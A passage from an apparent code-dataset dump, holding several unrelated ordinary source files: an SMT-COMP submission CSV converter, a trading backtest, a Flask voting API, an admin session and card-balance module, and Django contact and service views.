divisions in the Model-Validation Track to submit the solver to:'\n self.VARIANT = 'If this solver is a VARIANT of another submission, e.g. an experimental version, provide the name and the StarExec ID of the main solver, otherwise leave blank.'\n self.WRAPPER = f'If this solver is a WRAPPER TOOL (i.e., it includes and calls one or more other SMT solvers, see Section 4 of the competition rules at https://smt-comp.github.io/{year}/{rules}.pdf), list ALL wrapped solvers and their exact version here, otherwise leave blank.'\n self.DERIVED = f'If this solver is a DERIVED TOOL (i.e., any solver that is based on or extends another SMT solver, see Section 4 of the competition rules at https://smt-comp.github.io/{year}/{rules}.pdf), provide the name of the original tool here. A derived tool should follow the naming convention [name-of-base-solver]-[my-solver-name].'\n self.TEAM = 'Please list all contributors that you wish to be acknowledged here'\n self.SEED = 'Seed'\n self.HOMEPAGE = 'Solver homepage'\n self.SYSDESCR = 'System description URL'\n self.SYSDESCR_NAME = 'Title of the system description'\n\n\n# Print error message and exit.\ndef die(msg):\n print(\"error: {}\".format(msg))\n sys.exit(1)\n\ndef find_matches(logics, regexstr):\n regex = re.compile(regexstr)\n return [ l for l in logics if re.fullmatch(regex, l) ]\n\ndef collect_logics_regex(submission, drow, divisions):\n assert divisions is not None\n submission[TRACK_SINGLE_QUERY_REGEX] = drow[col.SINGLE_QUERY_TRACK]\n submission[TRACK_INCREMENTAL_REGEX] = drow[col.INCREMENTAL_TRACK]\n submission[TRACK_UNSAT_CORE_REGEX] = drow[col.UNSAT_CORE_TRACK]\n submission[TRACK_MODEL_VALIDATION_REGEX] = drow[col.MODEL_VALIDATION_TRACK]\n submission[TRACK_PROOF_EXHIBITION_REGEX] = drow[col.PROOF_EXHIBITION_TRACK]\n submission[TRACK_PARALLEL_REGEX] = drow[col.PARALLEL_TRACK]\n submission[TRACK_CLOUD_REGEX] = drow[col.CLOUD_TRACK]\n\n submission[TRACK_SINGLE_QUERY_RAW] = find_matches(divisions[TRACK_SINGLE_QUERY_RAW], drow[col.SINGLE_QUERY_TRACK])\n submission[TRACK_MODEL_VALIDATION_RAW] = find_matches(divisions[TRACK_MODEL_VALIDATION_RAW], drow[col.MODEL_VALIDATION_TRACK])\n submission[TRACK_UNSAT_CORE_RAW] = find_matches(divisions[TRACK_UNSAT_CORE_RAW], drow[col.UNSAT_CORE_TRACK])\n submission[TRACK_INCREMENTAL_RAW] = find_matches(divisions[TRACK_INCREMENTAL_RAW], drow[col.INCREMENTAL_TRACK])\n submission[TRACK_PROOF_EXHIBITION_RAW] = find_matches(divisions[TRACK_PROOF_EXHIBITION_RAW], drow[col.PROOF_EXHIBITION_TRACK])\n submission[TRACK_PARALLEL_RAW] = find_matches(divisions[TRACK_PARALLEL_RAW], drow[col.PARALLEL_TRACK])\n submission[TRACK_CLOUD_RAW] = find_matches(divisions[TRACK_CLOUD_RAW], drow[col.CLOUD_TRACK])\n\ndef collect_logics_2021(submission, drow):\n \"\"\"Collect logics for single-query and unsat core track.\n\n The form had a section with SQ and UC track as matrix.\n The resulting csv thus had logic columns that stated which\n tracks are entered for these two tracks.\"\"\"\n submission[TRACK_INCREMENTAL_RAW] = drow[col.INCREMENTAL_TRACK].split(';')\n submission[TRACK_MODEL_VALIDATION_RAW] = drow[col.MODEL_VALIDATION_TRACK].split(';')\n submission[TRACK_SINGLE_QUERY_RAW] = []\n submission[TRACK_UNSAT_CORE_RAW] = []\n for key, value in drow.items():\n if not key.startswith(col.SINGLE_QUERY_TRACK):\n continue\n logic = key.replace(col.SINGLE_QUERY_TRACK, '')\n if not value:\n continue\n assert logic[0] == '['\n assert logic[-1] == ']'\n logic = logic[1:-1]\n tracks = value.split(';')\n if 'Single-Query Track' in tracks:\n submission[TRACK_SINGLE_QUERY_RAW].append(logic)\n if 'Unsat Core Track' in tracks:\n submission[TRACK_UNSAT_CORE_RAW].append(logic)\n\n\ndef normalize_whitespace(drow):\n for key in drow.keys():\n drow[key] = re.sub(r'\\s+', ' ', drow[key])\n drow[key] = drow[key].strip()\n\n\n# Read csv with submissions data from Google Form.\ndef read_csv(col, fname, year, division):\n global g_submissions, g_logics_all\n with open(fname) as file:\n reader = csv.reader(file, delimiter=',')\n header = next(reader)\n g_submissions = []\n\n for row in reader:\n drow = dict(zip(iter(header), iter(row)))\n normalize_whitespace(drow)\n submission = dict()\n submission['username'] = drow[col.USERNAME]\n submission['solver_name'] = drow[col.SOLVER_NAME]\n if year < 2022:\n m = re.search(\n 'solver\\.jsp\\?id=(\\d+)', drow[col.STAREXEC_LINK])\n assert(m)\n submission['solver_id'] = m.group(1)\n else:\n submission['solver_id'] = drow[col.STAREXEC_SOLVERID]\n m = re.search('solver\\.jsp\\?id=(\\d+)', drow[col.VARIANT])\n if not m:\n submission['variant'] = drow[col.VARIANT]\n else:\n submission['variant'] = m.group(1)\n submission['wrapper'] = drow[col.WRAPPER]\n submission['derived'] = drow[col.DERIVED]\n submission['team'] = drow[col.TEAM]\n submission['seed'] = drow[col.SEED]\n submission['homepage'] = drow[col.HOMEPAGE]\n submission['sysdescr_url'] = drow[col.SYSDESCR]\n submission['sysdescr_name'] = drow[col.SYSDESCR_NAME]\n\n if year < 2022:\n collect_logics_2021(submission, drow)\n else:\n collect_logics_regex(submission, drow, divisions)\n\n if (not submission[TRACK_INCREMENTAL_RAW] and\n not submission[TRACK_MODEL_VALIDATION_RAW] and\n not submission[TRACK_SINGLE_QUERY_RAW] and\n not submission[TRACK_UNSAT_CORE_RAW] and\n not submission[TRACK_PROOF_EXHIBITION_RAW] and\n not submission[TRACK_PARALLEL_RAW] and\n not submission[TRACK_CLOUD_RAW]):\n die(f'Solver \"{drow[col.SOLVER_NAME]}\" '\\\n 'does not participate in any track')\n\n g_submissions.append(submission)\n\n\n# Write csv with uniform submission data of the form:\n# solver_id | solver_name | single_query_track | ... other tracks\n# .... | .... | entered divisions | ...\n# Order of tracks: single query, incremental, challenge, model val, unsat core\n# Columns are separated by ',' and divisions are separated by ';'.\ndef write_csv_2021(fname):\n with open(fname, 'w') as outfile:\n outfile.write(\",\".join([\n \"Preliminary Solver ID\",\n \"Solver ID\",\n \"Wrapped Solver ID Single Query\",\n \"Wrapped Solver ID Incremental\",\n \"Wrapped Solver ID Model Validation\",\n \"Wrapped Solver ID Unsat Core\",\n \"Solver Name\",\n \"Solver homepage\",\n \"System description URL\",\n \"System description name\",\n \"Competing\",\n \"Single Query Track\",\n \"Incremental Track\",\n \"Model Validation Track\",\n \"Unsat Core Track\",\n \"Variant Of\",\n \"Wrapper Tool\",\n \"Derived Tool\",\n \"Contact\",\n \"Team Members\",\n \"Seed\",\n ]) + \"\\n\")\n for submission in g_submissions:\n outfile.write(\"{},-1,,,,,\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",{},\"\n .format(\n submission['solver_id'],\n submission['solver_name'],\n submission['homepage'],\n submission['sysdescr_url'],\n submission['sysdescr_name'],\n \"yes\"))\n for track in [TRACK_SINGLE_QUERY_RAW,\n TRACK_INCREMENTAL_RAW,\n TRACK_MODEL_VALIDATION_RAW,\n TRACK_UNSAT_CORE_RAW]:\n if submission[track] == ['ALL']:\n outfile.write(\";\".join(g_logics_all[track]))\n else:\n outfile.write(\";\".join(submission[track]))\n outfile.write(\",\")\n outfile.write(\n \"\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",{}\".format(\n submission['variant'],\n submission['wrapper'],\n submission['derived'],\n submission['username'],\n submission['team'],\n submission['seed']\n ))\n outfile.write(\"\\n\")\n\n# Write csv with uniform submission data of the form:\n# solver_id | solver_name | single_query_track | ... other tracks\n# .... | .... | entered divisions | ...\n# Order of tracks: single query, incremental, challenge, model val, unsat core\n# Columns are separated by ',' and divisions are separated by ';'.\ndef write_csv_2022(fname):\n with open(fname, 'w') as outfile:\n outfile.write(\",\".join([\n \"Preliminary Solver ID\",\n \"Solver ID\",\n \"Config ID Single Query\",\n \"Config ID Incremental\",\n \"Config ID Model Validation\",\n \"Config ID Unsat Core\",\n \"Config ID Proof Exhibition\",\n \"Solver Name\",\n \"Solver homepage\",\n \"System description URL\",\n \"System description name\",\n \"Competing\",\n \"Single Query Regex\",\n \"Incremental Regex\",\n \"Model Validation Regex\",\n \"Unsat Core Regex\",\n \"Proof Exhibition Regex\",\n \"Cloud Regex\",\n \"Parallel Regex\",\n \"Single Query Track\",\n \"Incremental Track\",\n \"Model Validation Track\",\n \"Unsat Core Track\",\n \"Proof Exhibition Track\",\n \"Cloud Track\",\n \"Parallel Track\",\n \"Variant Of\",\n \"Wrapper Tool\",\n \"Derived Tool\",\n \"Contact\",\n \"Team Members\",\n \"Seed\",\n ]) + \"\\n\")\n for submission in g_submissions:\n outfile.write(\"{},-1,,,,,,\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",{},\"\n .format(\n re.sub(r',',';', submission['solver_id']),\n submission['solver_name'],\n submission['homepage'],\n submission['sysdescr_url'],\n submission['sysdescr_name'],\n \"yes\"))\n for track in [TRACK_SINGLE_QUERY_REGEX,\n TRACK_INCREMENTAL_REGEX,\n TRACK_MODEL_VALIDATION_REGEX,\n TRACK_UNSAT_CORE_REGEX,\n TRACK_PROOF_EXHIBITION_REGEX,\n TRACK_CLOUD_REGEX,\n TRACK_PARALLEL_REGEX]:\n outfile.write(f'\"{submission[track]}\",')\n for track in [TRACK_SINGLE_QUERY_RAW,\n TRACK_INCREMENTAL_RAW,\n TRACK_MODEL_VALIDATION_RAW,\n TRACK_UNSAT_CORE_RAW,\n TRACK_PROOF_EXHIBITION_RAW,\n TRACK_CLOUD_RAW,\n TRACK_PARALLEL_RAW]:\n outfile.write(\";\".join(submission[track]))\n outfile.write(\",\")\n outfile.write(\n \"\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",\\\"{}\\\",{}\".format(\n submission['variant'],\n submission['wrapper'],\n submission['derived'],\n submission['username'],\n submission['team'],\n submission['seed']\n ))\n outfile.write(\"\\n\")\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(\n usage=\"extract_data_from_submission \"\\\n \" \\n\\n\"\n \"Extract and convert csv data from submission form into \"\n \"uniformly formatted csv.\")\n parser.add_argument(\"year\", type=int,\n help=\"the year of the competition\")\n parser.add_argument(\"-d\", \"--division\", type=str, dest=\"division\",\n help=\"division.json file with tracks and logics\",\n required=False)\n parser.add_argument (\n \"in_csv\", help=\"the input submissions csv from Google Forms\")\n parser.add_argument (\n \"out_csv\", help=\"the output csv\")\n args = parser.parse_args()\n\n if not os.path.exists(args.in_csv):\n die(\"file not found: {}\".format(args.in_csv))\n\n if args.division:\n with open(args.division) as file:\n divisions = json.load(file)\n else:\n divisions = None\n\n col = ColumnNames(args.year)\n read_csv(col, args.in_csv, args.year, divisions)\n if args.year >= 2022:\n write_csv_2022(args.out_csv)\n else:\n write_csv(args.out_csv)\n","sub_path":"tools/prep/extract_data_from_submission.py","file_name":"extract_data_from_submission.py","file_ext":"py","file_size_in_byte":16115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"610927940","text":"from pyalgotrade import strategy\nfrom pyalgotrade.barfeed import quandlfeed\nfrom pyalgotrade.technical import ma, rsi\nfrom typing import Union\n\n\ndef safe_round(value: Union[float, None], digits: int) -> Union[float, None]:\n if value is not None:\n value = round(value, digits)\n return value\n\n\nclass FirstSmaRsiStrategy(strategy.BacktestingStrategy):\n def __init__(self, feed, instrument):\n super(FirstSmaRsiStrategy, self).__init__(feed)\n self.__instrument = instrument\n self.__sma = ma.SMA(feed[instrument].getCloseDataSeries(), 15)\n self.__rsi = rsi.RSI(feed[instrument].getCloseDataSeries(), 14)\n return\n \n def onBars(self, bars):\n bar = bars[self.__instrument]\n self.info('{} {} {}'.format(bar.getClose(), safe_round(self.__rsi[-1], 2), safe_round(self.__sma[-1], 2)))\n return\n\nfeed = quandlfeed.Feed()\nfeed.addBarsFromCSV('orcl', 'WIKI-ORCL-2000-quandl.csv')\n\nstrat = FirstSmaRsiStrategy(feed, 'orcl')\nstrat.run()\n","sub_path":"first-sma-rsi-strategy.py","file_name":"first-sma-rsi-strategy.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"516940315","text":"import json\nimport os\n\nfrom db import db, User, Take, Vote\nfrom flask import Flask, request\n\napp = Flask(__name__)\ndb_filename = \"takes.db\"\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///%s\" % db_filename\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\napp.config[\"SQLALCHEMY_ECHO\"] = True\n\ndb.init_app(app)\nwith app.app_context():\n db.create_all()\n\ndef success_response(data, code=200):\n return json.dumps({\"success\": True, \"data\": data}), code\n\ndef failure_response(message, code=404):\n return json.dumps({\"success\": False, \"error\": message}), code\n\n\n\n@app.route(\"/\")\n\n# User Routes\n@app.route(\"/api/users/\")\ndef get_users():\n return success_response( [ u.serialize() for u in User.query.all() ] )\n\n@app.route(\"/api/users/\", methods=[\"POST\"])\ndef create_user():\n body = json.loads(request.data)\n username = body.get(\"username\")\n email = body.get(\"email\")\n if username is None or email is None:\n return failure_response(\"Must provide a username and email\")\n new_user = User(username=body.get(\"username\"), email=body.get(\"email\"))\n db.session.add(new_user)\n db.session.commit()\n return success_response(new_user.serialize(), 201)\n\n@app.route(\"/api/users//\", methods=[\"DELETE\"])\ndef delete_user(user_id):\n user = User.query.filter_by(id=user_id).first()\n if user is None:\n return failure_response(\"User not found\")\n db.session.delete(user)\n db.session.commit()\n return success_response(user.serialize())\n\n\n# Take Routes\n@app.route(\"/api/users//takes/\", methods=[\"POST\"])\ndef create_user_take(user_id):\n user = User.query.filter_by(id=user_id).first()\n if user is None:\n return failure_response(\"User not found\")\n body = json.loads(request.data)\n text = body.get(\"text\")\n if text is None:\n return failure_response(\"Must provide a take\")\n new_take = Take(text=body.get(\"text\"), user=user)\n db.session.add(new_take)\n user.takes.append(new_take)\n db.session.commit()\n return success_response(new_take.serialize())\n\n@app.route(\"/api/users//takes/\")\ndef get_user_takes(user_id):\n user = User.query.filter_by(id=user_id).first()\n if user is None:\n return failure_response(\"User not found\")\n return success_response( [ t.serialize_with_votes() for t in Take.query.filter_by(user_id=user_id).all() ] )\n\n\n# Vote Routes\n@app.route(\"/api/takes//votes/\", methods=[\"POST\"])\ndef vote(take_id):\n take = Take.query.filter_by(id=take_id).first()\n if take is None:\n return failure_response(\"Take not found\")\n body = json.loads(request.data)\n vote = body.get(\"vote\")\n if vote is None:\n return failure_response(\"User must vote\")\n new_vote = Vote(vote=body.get(\"vote\"))\n db.session.add(new_vote)\n if body.get(\"vote\")==True:\n take.upvotes.append(new_vote)\n else:\n take.downvotes.append(new_vote)\n db.session.commit()\n return success_response(new_vote.serialize())\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host='0.0.0.0', port=port)\n","sub_path":"backend/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"641913325","text":"\"\"\"\nParameters to be loaded into the main model. \n\"\"\"\nimport time\n\n# user inputs (CHANGE HERE!) \n# ==========================================================\n# QUERY_IMAGE_PATH \t\t= '../data/bed/002.500.46.jpg'\n# QUERY_IMAGE_PATH \t\t= '../data/bed/002.392.33.jpg'\n# QUERY_IMAGE_PATH \t\t= '../data/bed/690.272.95.jpg'\nLIB_TYPE \t\t\t\t= 'chair'\nIMAGE_LIBRARY_PATH \t\t= '../data/' + LIB_TYPE + '/'\nFEATURE_LIBRARY_PATH \t= '../output/indexes/feat_lib_' + LIB_TYPE + '/'\nSAVE_LIB \t\t\t\t= False\n# LAYER_NAMES \t\t\t= ['block1_conv1', 'block1_conv2']\nLAYER_NAMES\t\t\t\t= None\n\nQUERY_IMAGE_PATH \t\t= '../data/objects/902.782.77.jpg'\n\nMODEL_TYPE \t\t\t\t= 'transfer_learn' # 'transfer_learn' # 'vgg16' or 'transfer_learn'\nMODEL_PATH\t\t\t\t= '../output/final_model.h5'\n\nOUTPUT_IMAGE_PATH \t\t= '../output/out-' + time.strftime('%Y%m%d-%H%M') + '.png'\n# OUTPUT_IMAGE_PATH\t\t= f'../output/{LIB_TYPE}-out-{LAYER_NAMES[0]}-{LAYER_NAMES[1]}.png'\nN_RESULTS \t\t\t\t= 4\n\n# ==========================================================\n\n# ignore these\nIMAGE_SIZE = 500\nIMAGE_WIDTH = IMAGE_SIZE\nIMAGE_HEIGHT = IMAGE_SIZE\n\n# VGG16 layer names for content and style extraction\nCONTENT_LAYERS = [\"block2_conv2\"]\nSTYLE_LAYERS = [\"block1_conv2\", \"block2_conv2\", \"block3_conv3\", \"block4_conv3\", \"block5_conv3\"]","sub_path":"pair/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28579640","text":"import csv\n\nfrom pydantic import BaseModel\n\nfrom app.common import logger, errors\nfrom app.usecases.context import Context\n\nfrom app.domain import admins, sessions\nfrom app.domain import wallets\nfrom app.domain import clients\nfrom app.domain import customers\nfrom app.domain import card_proxies\n\nfrom app.common import security as sek\nfrom app.common import json as json_util\n\nfrom app.services import fis_client\n\n\n#\n# Shared Outputs\n#\nclass AdminOut(BaseModel):\n admin_id: int\n identifier: str\n first_name: str\n last_name: str\n status: str\n level: str\n client_id: int\n created_at: str\n updated_at: str\n title: str = \"\"\n\n @staticmethod\n def from_admin(d):\n return AdminOut(\n admin_id=d.admin_id,\n identifier=d.identifier,\n first_name=d.first_name,\n last_name=d.last_name,\n status=d.status,\n level=d.level,\n client_id=d.client_id,\n created_at=d.created_at,\n updated_at=d.updated_at,\n title=d.title,\n )\n\n\n\n#\n# writes\n#\nasync def create(ctx: Context, identifier, passphrase, first_name, last_name,\n client_id, level, title=\"\"):\n sa_repo = admins.AdminsRepo(ctx.db)\n c_repo = clients.ClientsRepo(ctx.db)\n\n exists = await sa_repo.get_by_identifier(identifier)\n \n if exists:\n return False, errors.E['admins_identifier_exists']\n\n # ensure that the client and wallet exist\n client_exists = await c_repo.get_by_client_id(client_id)\n if not client_exists:\n return False, errors.E['admins_invalid_client_id']\n \n rec = await sa_repo.create(identifier, passphrase, first_name, last_name,\n client_id, level, title=title)\n\n if rec:\n return True, admins.Admin.from_record(rec) \n else:\n return False, errors.E['admins_unable_to_create']\n\nasync def load_from_csvfile(ctx: Context, client_id, file_path):\n c_repo = customers.CustomersRepo(ctx.db)\n sa_repo = admins.AdminsRepo(ctx.db)\n added = []\n not_added = []\n\n with open(file_path, 'r') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n user_exists = await c_repo.get_by_identifier(row['Mobile Number'])\n \n if(user_exists):\n print(f\"about to load {row['Amount']} for user with phone number {row['Mobile Number']} and with clientID {user_exists['client_id']} \")\n \n _added = [a['identifier'] for a in added]\n return True, _added, not_added\n\n\nasync def disable(ctx: Context, admin_id):\n changed = await _change_status(ctx, admin_id, admins.STATUS_INACTIVE,\n errors.E['admins_unable_to_disable'])\n return changed\n\n\nasync def enable(ctx: Context, admin_id):\n changed = await _change_status(ctx, admin_id, admins.STATUS_ACTIVE,\n errors.E['admins_unable_to_enable'])\n return changed\n\n\nasync def _change_status(ctx: Context, admin_id, status, failure_message):\n sa_repo = admins.AdminsRepo(ctx.db)\n\n exists = await sa_repo.get_by_admin_id(admin_id) \n\n if not exists:\n return False, errors.E['admins_id_not_found']\n\n rec = await sa_repo.change_status(admin_id, status)\n\n if rec:\n return True, admins.Admin.from_record(rec)\n else:\n return False, failure_message\n\n\n#\n# reads\n#\nasync def view_admin(ctx: Context, admin_id):\n sa_repo = admins.AdminsRepo(ctx.db)\n rec = await sa_repo.get_by_admin_id(admin_id)\n\n if rec:\n return True, admins.Admin.from_record(rec)\n else:\n return False, errors.E['admins_id_not_found']\n\n\nasync def get_all_admins(ctx: Context, client_id):\n sa_repo = admins.AdminsRepo(ctx.db)\n recs = await sa_repo.get_all_admins(client_id)\n found = [admins.Admin.from_record(r) for r in recs]\n\n return True, found\n\n\nasync def search_admins(ctx: Context, client_id=None):\n sa_repo = admins.AdminsRepo(ctx.db)\n\n if client_id:\n recs = await sa_repo.search(client_id=client_id)\n else:\n recs = await sa_repo.search()\n\n return True, [admins.Admin.from_record(r) for r in recs]\n\n\nasync def check_status(ctx: Context, proxy):\n sa_repo = admins.AdminsRepo(ctx.db)\n\n cust = await sa_repo.check_status(proxy)\n\n if cust:\n return True, admins.Admin.from_record(cust)\n else:\n return False, errors.E('proxy_key_not_found')\n\n\nasync def check_customer_card_balance(ctx: Context, admin_id, customer_id):\n # ensure that this admin can view this customer's information\n can_do = await _admin_can_view_customer(ctx, admin_id, customer_id)\n if not can_do: \n return False, errors.E['admins_invalid_customer_access']\n\n r_repo = card_proxies.CustomerCardProxiesRepo(ctx.db)\n\n cust_proxy = await r_repo.get_customer_active_proxy(customer_id)\n if not cust_proxy:\n return False, errors.E['customers_no_active_proxy']\n\n fis_res, fis_data = await fis_client.get_proxy_balance(cust_proxy['proxy'])\n if not fis_res:\n return False, errors.E['customers_unable_to_retrieve_balance']\n\n fis_parsed = fis_client.parse_pipe_response(fis_data)\n res_data = {\n 'current_balance': fis_parsed[0],\n 'proxy': fis_parsed[1],\n 'customer_id': customer_id\n }\n\n return True, res_data\n\n\nasync def check_customer_card_status(ctx: Context, admin_id, customer_id):\n # ensure that this admin can view this customer's information\n can_do = await _admin_can_view_customer(ctx, admin_id, customer_id)\n if not can_do: \n return False, errors.E['admins_invalid_customer_access']\n\n r_repo = card_proxies.CustomerCardProxiesRepo(ctx.db)\n\n cust_proxy = await r_repo.get_customer_active_proxy(customer_id)\n if not cust_proxy:\n return False, errors.E['customers_no_active_proxy']\n\n fis_res, fis_data = await fis_client.get_proxy_status(cust_proxy['proxy'])\n\n if not fis_res:\n return False, errors.E['customers_unable_to_retrieve_proxy_status']\n\n fis_parsed = fis_client.parse_pipe_response(fis_data)\n res_data = {\n 'proxy_status': fis_parsed[0].lower(),\n 'exp_date': fis_parsed[1],\n 'proxy': cust_proxy['proxy'],\n 'customer_id': customer_id\n }\n\n return True, res_data\n\n\n#\n# helpers\n#\nasync def do_login(ctx: Context, identifier, passphrase):\n sa_repo = admins.AdminsRepo(ctx.db)\n s_repo = sessions.SessionsRepo(ctx.redis)\n\n rec = await sa_repo.get_by_identifier(identifier)\n if not rec:\n return False, None, errors.E['admins_identifier_not_found']\n\n if rec['admin_status'] != admins.STATUS_ACTIVE:\n return False, None, errors.E['admins_not_active']\n\n pass_match = sek.pass_match(passphrase, rec['passphrase'])\n if not pass_match:\n return False, None, errors.E['admins_invalid_credentials']\n\n honeypot = sessions.gen_session_key()\n session_id = sessions.gen_session_key()\n ses_key = sessions.make_session_key(session_id)\n\n rec_data = sessions.record_to_dict(rec)\n rec_data['honeypot'] = honeypot\n\n _entity_type = sessions.ENTITY_TYPE_STORE_ADMIN\n if rec['level'] == admins.LEVEL_COMPANY:\n _entity_type = sessions.ENTITY_TYPE_COMPANY_ADMIN\n\n data = await s_repo.create(session_id,\n ses_key,\n rec['admin_id'],\n _entity_type,\n rec_data)\n ret_data = {\n 'admin_id': rec['admin_id'],\n 'identifier': rec['identifier'],\n 'admin_status': rec['admin_status'],\n 'level': rec['level'],\n 'honeypot': honeypot,\n 'session_id': session_id\n }\n\n return True, session_id, ret_data\n\n\nasync def do_logout(ctx: Context, session_id):\n s_repo = sessions.SessionsRepo(ctx.redis)\n ses_key = sessions.make_session_key(session_id)\n\n data = await s_repo.get(ses_key)\n\n if not data:\n return False, errors.E['admins_invalid_authorization']\n\n deleted = await s_repo.remove(ses_key)\n if not deleted:\n return False, errors.E['admins_unable_to_clear_session']\n\n return True, deleted\n\n\nasync def view_session(ctx: Context, session_id):\n s_repo = sessions.SessionsRepo(ctx.redis)\n ses_key = sessions.make_session_key(session_id)\n\n data = await s_repo.get(ses_key)\n if not data:\n return False, errors.E['admins_invalid_authorization']\n\n ret_data = {\n 'admin_id': data['entity_id'],\n 'identifier': data['data']['identifier'],\n 'admin_status': data['data']['admin_status'],\n 'level': data['data']['level'],\n 'honeypot': data['data']['honeypot'],\n 'session_id': session_id\n }\n\n return True, ret_data\n\n\nasync def _admin_can_view_customer(ctx: Context, admin_id, customer_id):\n sa_repo = admins.AdminsRepo(ctx.db)\n c_repo = customers.CustomersRepo(ctx.db)\n \n # initially just checking that the customer and admin are of the same client\n # unclear if we need to limit this to a specific store...\n _admin = await sa_repo.get_by_admin_id(admin_id)\n _customer = await c_repo.get_by_customer_id(customer_id)\n\n return _admin['client_id'] == _customer['client_id']\n","sub_path":"main-service-master/mount/app/usecases/admins.py","file_name":"admins.py","file_ext":"py","file_size_in_byte":9213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"110080822","text":"# _*_ coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom .forms import SignUpForm, FormContato\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n\n# Create your views here.\ndef assine(request):\n\ttitulo = \"Bem vindo\"\n\n\tform = SignUpForm(request.POST or None)\n\n\tcontexto = {\n\t\t'titulo':titulo, \n\t\t'form':form\n\t}\n\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tcontexto = {\n\t\t\t\t'titulo':'Obrigado', \n\t\t\t\t}\n\n\t#if request.user.is_authenticated():\n\t#\ttitulo = \"Bem vindo %s\" % request.user\n\n\t# As variaveis usadas nos templates devem ser colocadas em um dicionario\n\t\n\treturn render(request, \"assine.html\", contexto)\n\ndef contato(request):\n\tform = FormContato(request.POST or None)\n\n\tcontexto = {\n\t\t'formulario':form,\n\t\t'titulo':'Contato',\n\t}\n\n\tif form.is_valid():\n\t\ttry:\n\t\t\temail = form.cleaned_data.get(\"email\")\n\t\t\tmensagem = form.cleaned_data.get(\"mensagem\")\n\t\t\tnome_completo = form.cleaned_data.get(\"nome_completo\")\n\n\t\t\t#Dados para envio do email\n\t\t\tassunto = 'Contato pelo site'\n\t\t\tremetente = settings.EMAIL_HOST_USER\n\t\t\tdestinatarios = [remetente]\n\n\t\t\t# Solucao para contornar o erro \"sequence item 0: expected string or Unicode, list found\"\n\t\t\tvalues = ','.join(str(v) for v in destinatarios)\n\n\t\t\tcorpo_email = '''\n\t\t\tEnviado por: %s \\n \n\t\t\tMensagem: %s. \\n\n\t\t\temail: %s\n\t\t\t''' %(nome_completo, mensagem, email)\n\n\t\t\tsend_mail(assunto, corpo_email, remetente, [values], fail_silently=False)\n\t\t\tcontexto = {\n\t\t\t\t\t'titulo':'Contato',\n\t\t\t\t\t'mensagem':'Sua mensagem foi enviada, obrigado!'\n\t\t\t\t}\n\t\texcept:\n\t\t\tcontexto = {\n\t\t\t\t\t'formulario':form,\n\t\t\t\t\t'titulo':'Contato',\n\t\t\t\t\t'mensagem':'Desculpe, sua mensagem nao foi enviada!'\n\t\t\t\t}\n\n\treturn render(request, \"contato.html\", contexto)\n\ndef home(request):\n\tcontexto = {\n\t\t'titulo':'Home'\n\t}\n\treturn render(request, \"home.html\", contexto)\n\ndef quemsomos(request):\n\ttitulo = 'Quem Somos'\n\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\treturn render(request, \"quemsomos.html\", contexto)\n\ndef texturas(request):\n\ttitulo = 'Texturas'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"texturas.html\", contexto)\n\ndef pintura(request):\n\ttitulo = 'Pintura'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"pintura.html\", contexto)\n\ndef gesso(request):\n\ttitulo = 'Decoração em gesso'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"gesso.html\", contexto)\n\ndef pisos(request):\n\ttitulo = 'Pisos e revestimentos'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"pisos.html\", contexto)\n\ndef drywall(request):\n\ttitulo = 'Drywall'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"drywall.html\", contexto)\n\ndef predial(request):\n\ttitulo = 'Pintura predial'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"predial.html\", contexto)\n\ndef eletricos(request):\n\ttitulo = 'Eletricos e hidráulicos'\n\t\n\tcontexto = {\n\t\t'titulo':titulo,\n\t}\n\n\treturn render(request, \"eletricos.html\", contexto)\n","sub_path":"newsletter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"74255019","text":"from .misc import RSPlot, RSObject, np\nfrom random import random\nimport matplotlib.animation as ani\n\n\nclass TPObject(RSObject):\n b_vertical = True\n\n def __init__(self, name, color, **kwargs):\n RSObject.__init__(self, name=name, msgforecolor=color)\n self._left = 0\n self._top = 0\n self._width = 0\n self._height = 0\n self.__dict__.update(kwargs)\n\n ##############\n # Properties #\n ##############\n @property\n def left(self):\n return self._left\n\n @left.setter\n def left(self, v):\n self._left = v\n\n @property\n def top(self):\n return self._top\n\n @top.setter\n def top(self, v):\n self._top = v\n\n @property\n def width(self):\n return self._width\n\n @width.setter\n def width(self, v):\n self._width = v\n\n @property\n def height(self):\n return self._width\n\n @height.setter\n def height(self, v):\n self._height = v\n\n @property\n def right(self):\n return self.left + self.width\n\n @property\n def bottom(self):\n return self.top + 